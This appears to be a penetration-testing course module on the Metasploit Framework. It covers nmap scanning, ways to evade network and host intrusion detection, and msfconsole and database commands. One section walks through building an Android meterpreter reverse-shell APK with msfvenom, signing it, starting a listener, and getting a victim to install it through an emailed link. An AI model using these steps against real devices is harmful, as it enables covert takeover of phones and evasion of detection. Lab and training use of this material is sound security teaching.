KL_Module_3

MODULE 3

Introduction to MSF (Metasploitable Framework)

What is Metasploit Framework?

The Metasploit Framework (Msf) is a free, open source penetration testing solution developed
by the open source community and Rapid7. This module covers the different types of Exploits
using this tool. Metasploit saves considerable time and effort by eliminating the need for
writing of individual exploits.

Metasploit’s usefulness ranges from defending your own systems by breaking into them, to
learning about vulnerabilities that pose a real risk.

Metasploit Framework is a Ruby-based platform used to develop, test and execute exploits
against remote hosts.

It includes a full collection of security tools used for penetration testing, along with a powerful
terminal-based console — called msfconsole — which allows you to find targets, launch scans,
exploit security flaws and collect all available data.

What can it do?

Reconnaissance Phase

In the intelligence gathering phase, it is necessary to gather as much information as possible
about the target network. The target network can be a website or an organization. The most
important aspect is to gather information about the target from social media networks and use
Google dorks (a way to extract sensitive information from Google using specialized queries) to
find sensitive information related to the target. Foot printing the organization using active and
passive attacks can also be an approach.

This phase is one of the most crucial phases in penetration testing. Properly acquired
knowledge about the target will help the tester to stimulate appropriate and exact attacks,
rather than trying all possible attack mechanisms. It will also help them save an ample amount
of time. This phase will consume 40 to 60 percent of the total time of the testing, as gaining
access to the target depends largely upon how well the system is foot printed.

It's the duty of a penetration tester to gain adequate knowledge about the target by conducting
a variety of scans; scanning for services, looking for open ports, and identifying all the services
running on those ports, and also to decide which services are vulnerable and how to make use
of them to enter into the desired system.

Enumeration and Discovery
The first phase of penetration involves scanning a network or a host to gather information and
create an overview of the target machine.
Discovery Scan basically creates an IP list in the target network and discovers services running
on the machines. To do this in Metasploit, we will use the command promp which are NMAP
commands incorporated in Metasploit.
Now let’s see in practice how it exactly works. We started the target machine (Metasploitable)
and the Windows Server 2003 machine with the IP 192.168.1.101.

Next, we will start Metasploit. Here, we are using Kali Linux. Hence, the commands will always
start with nmap.
Let’s start to scan the network with range 192.168.0.0/24 and discover the machines.

As can be seen in the above screenshot, there are 5 hosts up in the network with details. Now
that we found the hosts that are alive, we will try to find the OS they are running on and their
background services.

We will try to attack the vulnerable machine with the IP 192.168.1.101. To do so, we will run
the following command – Nmap –sV-O –T4 192.168.1.101

Here,

• –sV parameter will detect the services with their version details.
• –O is to detect the version of OS which in our case is Linux 2.6.X
• –T4 is the time that we let the scan to finish

You will get the following screen as an output of using the above command.

Evade Detection on Remote Hosts

Intrusion Detection systems (IDS) are becoming more and more widely deployed to supplement
the security provided by firewalls. In the digital world, IDSs functions in almost the same way as
a burglar alarm does in the physical world. Like all alarms, IDSs have weak points and flaws that
can be exploited by an attacker to get around the system. Some people have even begun to
pronounce the death of the IDS because of its failure to identify all attacks, frequent false
positive alerts and failure to provide a significant Return On Investment (ROI). Regardless of
how secure systems become there will always be people attempting to gain access they do not
need, for this reason IDS constantly needs to advance.

The purpose of this phase is to show methods that attackers can use to fool IDSs into thinking
they are legitimate traffic. With techniques like obfuscation, fragmentation, Denial of Service
(DoS), and application hijacking the attacker can pass traffic under the nose of an IDS to prevent
their detection. These attack techniques will require that the next generation of IDS evolve into
a centralized security management platform, capable of a high level of network visibility,
allowing it to better protect the network.

Methods of evading Network IDS

When an attacker attempts to evade an IDS, they determine the weaknesses in the design and
try to exploit them. Each type of IDS has different strengths and weaknesses. Typically, NIDS are
designed as passive (IDS) or intrusive (IPS) monitors of network traffic. This allows a single NIDS
appliance to protect a great deal of systems (as long as they are on the same network
segment.)

A NIDS can detect attacks through one of two methods - signature matching or abnormality
detection.

The signature matching method works very similarly to today’s virus scanners. Each attack has a
signature of how it is carried out. When that signature is seen on the network, the NIDS
generates an alarm. NIDS, with abnormality detection, establishes a baseline of the network
traffic that is considered normal. It then alarms when conditions are not normal.

Abnormality detection NIDS are not as commonly deployed as signature based because of the
large amount of time needed to establish the baseline and their initial high rate of false
positives. Evasion of abnormality detection NIDS is more a game of luck than skill because the
malicious traffic cannot exceed the abnormality thresholds established for the network being
monitored. The rest of this section will be referenced against signature based IDSs because of
the limited installation base of abnormality detection IDSs

While a large protection scope is the biggest single advantage of NIDS it is also the largest
weakness. This weakness can be manipulated through obfuscation, fragmentation, encryption,
or overloading.

1. Obfuscation:

Obfuscation is the process of manipulating data in a way that the IDS signature will not
match the packet that is passed yet the receiving device with still interpret it properly.
For instance, sending a packet encoded differently or adding extraneous null characters.

An example is this string:

“../../c:\winnt\system32\netstat.exe”

that would not be interpreted by the IDS the same way as:

“%2e%2e%2f%2e%2e%2fc:\winnt\system32\netstat.exe”

However, a Web server would interpret both strings the same under the interpretation
rules of the Hyper Text Transfer Protocol (HTTP). This example was very popular for a

time and so both NIDS and Web Server vendors are no longer fooled by this simple
example, but the principle is still solid for any interpreter that allows alternate
command forms. This particular method can also get by both HIDS and NIDS if done
correctly.
2. Fragmentation
Fragmentation is simply breaking an attack into multiple packets. Fragmentation of packets
occurs normally, and hosts are equipped to handle receiving data in multiple pieces and
potentially in the wrong order.

A Quick example is depicted below

In this example, the attack packet “DATA” is broken into four different packets. The host
at the receiving end will reassemble the fragmented packets and receive the data
payload in the fragmented order and then put the packets into the correct sequence by
using the unique packet sequence number assigned to each packet. But a NIDS is only
going to see the parts. Each part is not an attack packet so the NIDS will not alert
anyone. Some NIDS will reassemble packets to avoid fragmentation attacks. But not all
have the processing overhead available to reassemble fragmented packets. But even if
the NIDS that can reassemble packets it will have a physical limit to how many it can or
will reassemble. Thus, an attacker can send a fragmented attack and at the same time
send a large amount of fragmented ‘junk’ packets. While the IDS is attempting to
reassemble all the ‘junk’ packets, the fragment attack may go through unnoticed by the
IDS. Or if the attacker does not have the resources to flood the NIDS, the attacker can
also attempt to wait out the capture buffer on the NIDS. The NIDS will, as in the example
at the right, get the first three packets but not the entire attack signature, since the last
part of the fragment is not received in the appropriate time interval, the first three are

dropped by the time the fourth gets to the IDS and host. All four will be reassembled on
the host in a successful attack but the NIDS will not alert.
3. Encryption

To be effective, NIDS needs to be able to examine the payload of every packet that
crosses its path. This can be harmful in multiple ways; the primary being encrypted
network traffic. When SSL, SSH, and IPSec encrypted tunnels are established they
prevent the NIDS from being able to interpret the packet’s true payload. This allows an
attacker to use a target’s security against themselves. This can be particularly deadly
when the system has the same root directory for both unencrypted (http) and
encrypted (https) web sites. (This is the default on Microsoft IIS as soon as a certificate is
installed). In this scenario the attacker uses any attack against the HTTPS Web site, such
as SQL injection, buffer overflows, and directory traversals, that would work on the
HTTP site. Because HTTPS uses SSL to provide a secure network connection, the traffic is
encrypted and therefore flows past the NIDS without triggering an alert. Also,
encryption can prevent an attacker from being detected while they do other unsavory
things after they have compromised the host.

The rising popularity of SSL VPNs will also likely contribute to this problem. SSL VPNs are
designed to allow portable, easy to setup encrypted sessions between client stations
and the corporate network. This permits people to use public Internet terminals to
securely connect to their corporate private network to access electronic mail and other
internal services. The SSL VPN has two challenges for our NIDS. The first challenge is that
with an SSL VPN the network can be attacker and as the traffic is encrypted the NIDS will
not detect the attack. Even if they are detected, the chances of that individual being
caught are very small. With the rising popularity of free Internet access provided by
restaurants, cafes, and libraries and a tool like SSL VPN’s attackers can attack from
anonymous locations with little fear of being tracked electronically or being caught. The
second challenge is that, even if the IDS were able to decrypt traffic on the fly to report
attacks, the attacker can easily setup a large number of encrypted sessions from other
hosts they control that could potentially prevent the NIDS from being able to decrypt
the traffic meaningful to the .To protect against an attacker encrypting their commands,
future NIDSs should alert if they see any outbound encrypted session from any host that
does not normally conduct encrypted sessions, as well as any large number of inbound
session initiations that would be typical of a brute force password guessing attack over
SSH or an SSL VPN.

Methods of Evading a Host based IDS

Host Based Intrusion Detection Systems (HIDS) work differently than NIDS and therefore have
different strengths and weaknesses. HIDS are designed to be installed on individual servers and
workstations that you wish to protect. The HIDS software can be implemented at various levels.

Some monitor the host for critical files that should not change and alert appropriate personnel
if they change. Others monitor the network connections, general input strings and system
memory for signatures, like signature-based NIDS, but only for the machine on which they are
installed. File monitoring HIDS like Tripwire can useful but also problematic because of several
design flaws. Monitoring every file on the system will produce many false positives, and not all
attacks will change a file. The last type of HIDS attempts to get away from the idea of signature
matching. This type of HIDS, called abnormality detection, will report when either a typical
hacker action is taken or just alert whenever a system setting is changed. The signature-based
HIDS monitors requests made to the system and alerts based on an attack signature. However,
no alert is issued if the signature is not matched. Abnormality detection can have a very high
false positive rate if it is not properly configured. While less of a problem for HIDS than for
NIDS, false positive generation can still be significant enough to numb security staff into not
taking alerts seriously. As HIDS has improved, most intrusion detection systems use a
combination of these elements in their product. In theory, the problem with HIDS is that, if the
machine is compromised, what stops the attacker from manipulating the HIDS to prevent their
attacks from being alerted?

1. File Locations and Integrity
HIDS require different methods to avoid generating alarms. Majority of known HIDS
evasion methods try to exploit the signature-based products. Evading file monitoring
HIDS has fewer options besides avoiding file changing exploits. All File HIDS use either
MD5 or some variant of this algorithm to make a hash of monitored files. The MD5
algorithm has been defined by its author as “It is conjectured that it is computationally
infeasible to produce two messages having the same message digest, or to produce any
message having a given prespecified target message digest.” The message digest is like a
fingerprint. If even one-bit changes in the original file, the computed MD5 hash will
change as well. Although it is possible that two files will have the same digest, it would
take an attacker an infeasible amount of time to develop a file with the same fingerprint
and that file is not likely to do what the attacker wanted.
Usually, the file monitor MD5 database is password or key protected thus making
substituting files difficult. The attacker must exploit just the weaknesses of the file
monitoring method’s design. Most file monitoring HIDS have directories that are
excluded because they will often have files created and removed or modified. A
common location that can be used to evade file monitors are temporary directories.
These can be used for the initial exploit code until the attacker can determine where
they can safely write files, such as home directories or other locations that are not likely
to be monitored. Then, once the system is compromised, the attacker simply needs to
remove the file monitor or be stealthy and recomputed file hashes if they can crack the
password on the MD5 database.

Exploit Development and Execution

Metasploit Framework is a penetration testing toolkit, exploit development platform, and a research
tool. It includes a lot of pre-verified exploits and auxiliary modules for a handy penetration test.
Different payloads, encoders, handlers, etc. are also a part of Metasploit. They can be mixed up to work
on any penetration testing kind of work.

One of the very nice features of Metasploit is its tool-arsenal for post-exploitation activities.
Meterpreter has been developed within Metasploit for making this task faster and easier.

MSFvenom t is a combination of msfpayload and msfencode. These tools are extremely useful
for generating payloads in various formats and encoding these payloads using various encoder
modules. It made sense to merge these two tools into one. It regulates the command line
options, speeds things up a little by using a single framework instance and handles all possible
output formats.

Example: MSFvenom used to make a payload to penetrate the android emulator.

By using MSFvenom we create a payload .apk file. For this we use the following command:

Terminal: msfvenom –p android/meterpreter/reverse_tcp LHOST=10.0.2.5 LPORT=4444 R >
/root/Desktop/pentest.apk

MSFvenom payload

• -p = Payload to be used
• LHOST = Localhost IP to receive a back connection (Check yours with ifconfig command).
• LPORT= Localhost Port on which the connection listens for the victim (We set it to 444).
• R = Raw format (We select apk).
• Location = to save the file.

Note: In this command, we have used the local address because we are in the local
environment. To this in the public network, you have to enter your public address in LHOST and
enable the port forwarding on the Router.

After this command, you can now locate your file on the Desktop with the name pentest.apk.

Pentest File Located

After Successfully created .apk file, we need to sign a certificate as Android mobile devices do
not allow installing apps without the appropriately signed certificate. Android devices only
install the signed .apk files.

We need to sign the apk file manually in Kali Linux using:

• Keytool (Preinstalled)
• jar signer (Preinstalled)
• zipalign (Need to Install)

To sign the apk file locally use these commands:

Terminal: keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA
-keysize 2048 -validity 10000

Keytool making Keystore
Terminal: jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-
key.Keystore APPNAME.apk aliasname

Signing an apk file with JARsigner
Terminal:jarsigner -verify -verbose -certs APPNAME.apk

Verifying the Apk using jar signer
Zipalign is not preinstalled in Kali Linux, so you must install it first.

Installing zipalign

Terminal: zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
Verifying the apk into new file using zipalgin

Now that we have signed our pentest.Apk file successfully, it can be run on any Android device.
Our new filename is Android.apk after the verification with zipalaign.

Showing APK file
Now we must start the listener on the Kali Linux machine with multi/handler exploit using
Metasploit.
Terminal: msfconsole

Starting Metasploit
Metasploit begins with the console.

Display Metasploit start screen
Now launch the exploit multi/handler and use Android payload to listen to the clients.
Terminal: use exploit/multi/handler

Setting up the exploit.
Now set the options for payload, listener IP (LHOST) and listener PORT(LPORT). We have used
localhost IP, port number 4444 and payload android/meterpreter/reverse_tcp while creating an
APK file with MSFvenom.

Setting up the exploit
Then we can successfully run the exploit and start listening to the android device. Now, the
device installs our app on the device, and it gets penetrated with exploit
Terminal: exploit

Executing the exploit

Now we transfer the Android.Apk file to the victim’s mobile device. In our environment, we are
using an android emulator to penetrate the Android device. For sharing android.apk to the
victim an email link or share the downloading link to the mobile device.

Now when the victim opens the link and download and install the apk created by you.

After completing the installing, we are going to start the meterpreter session on our kali
machine. It will give you a Reverse TCP connection and connect you with the victim’s device.

Working with the MSFconsole

What is Msfconsole?

Metasploit has different interfaces to ease our tasks. We can perform a variety of tasks with
these interfaces.

1. MSFConsole:
This is the main interface we use throughout this document.
Open terminal. Type: msfconsole.
You will get a window like the screenshot below.

Msfconsole eases all our tasks compared to other interfaces.

Updating Metasploit with msfupdate
Begin with updating Metasploit by using the following command in a terminal session (not in
msfconsole): msfupdate
This command should update the Metasploit framework to the latest version. The update tells
us that we should be expecting updates almost weekly.
Beware: Running msfupdate might break your Metasploit installation. After running this
command for this tutorial, you could run into errors like:

An error occurred while installing pg (0.18.3), and Bundler cannot continue.
Make sure that gem install pg -v '0.18.3' succeeds before bundling.
This error had something to do with PostgreSQL and to fix this problem first try to run the
following commands:

• apt-get update
• apt-get upgrade
• apt-get dist-upgrade
This should solve problem. It could be something to do with an outdated version of a package.
To become familiar with the Metasploit framework one should know the basic commands of
Metasploit. Metasploit commands are classified into 2 types:
• Core Commands.
• Database commands.

1. Core Commands



Useful Commands:

1. Back: To come back from the current exploit or module
2. Banner: This command displays Metasploit banner
3. connect: This command is used to connect to the host. You should specify the host IP

address and port number along with this command.
4. exit and quit: These commands are used to exit from Metasploit and come to the root.
5. irb: This command is used to drop an irb mode.Using this mode one can write one's own

ruby scripts.
6. info: This command displays the whole information about the selected exploit.
7. load: This command is used to load plugins into Metasploit.
8. unload: This command is used to unload the loaded plugin from the framework.
9. search: This command is used to search a specific exploit or module.
10. resource: This command is used to run specific commands from a specified file. You

should give the file path along with this command.
11. use: This command is used to select a specific exploit.
12. version: This command will display the current version of Metasploit.
13. set and unset: These commands set variables. By using these commands we can set our

payloads and we can set an IP address. Using unset we can unset the value and we can
give the new IP address.
14. setg and unsetg: These commands are used to set our variable globally throughout our
pen testing.
15. show: This command is used to view the options or modules.
2. Database commands:
Database commands are very useful to maintain huge data and export that data into
files. We can share data among our pen testing team, and we can collaborate that data.

How to connect to the database?
We should use the db_connect command to connect to the database. To connect to the
database, we should know the password, username, port, hostname and database
name all these details you can find in the database.yml file. You can access this file
through cd /opt/metasploit/config/ :~ cat database.yml

1. db_connect:This command is used to connect to the database. The format to use
this command is " db_connect
username:password@hostname:portname/database " name. In this system my
username password is db_connect msf3:4bfedfc2@localhost:7337/msf3dev

2. db_disconnect: To disconnect from the database. Here you can see the status as no
connection.

3. db_status: To see the current status of the database.
4. creds: This command is used to view the credential stored in the system. This

command shows the hashed passwords.
5. db_import: To import the files from various software like Nessus and nexpose.
6. db_export: To export our results to other software.
7. hosts: This command will display the connected hosts.
8. db_nmap: Nmap is a very useful tool for pen tester and network engineers. You can

perform many tasks using Nmap tool.
example: db_nmap -O 192.168.217.131. It displays the services and operating
system info.
9. services: This command will display the list of all services running.
10. Vulns: It will display the vulnerabilities existing in the victim system.

Categories of Exploits
All exploits in the Metasploit Framework will fall into two categories – Active or Passive

1. Active Exploits
Active exploits will exploit a specific host, run until completion, and then exit.

• When a shell opens from the victim brute-force modules will exit.
• If an error is encountered, module execution stops.
• You can force an active module to the background by passing ‘-j’ to the exploit

command:

2. Passive Exploits
Passive exploits wait for incoming hosts and exploit them as they connect.
• Passive exploits almost always focus on clients such as web browsers, FTP
clients, etc.
• They can also be used along with email exploits, waiting for connections.
• Passive exploits report shells as they happen can be enumerated by passing ‘-l’
to the sessions command. Passing ‘-i’ will interact with a shell.

References:

• Metasploit Discovery Scans -Tutorials Point
https://www.tutorialspoint.com/metasploit/metasploit_discovery_scans

• Methods of evading Network IDS- Sans Insitute
https://www.sans.org/reading-room/whitepapers/detection/paper/1284

• Hacking an android device with MSFvenom – Anastasis Vasileiadia
https://www.prodefence.org/hacking-android-device-msfvenom/

• Metasploit Guide
https://www.scribd.com/document/282604965/Met-as-Ploit-Guide

• Working with Active and Passive Exploits in Metasploit
http://pentest.tonyng.net/working-with-active-and-passive-exploits-in-metasploit/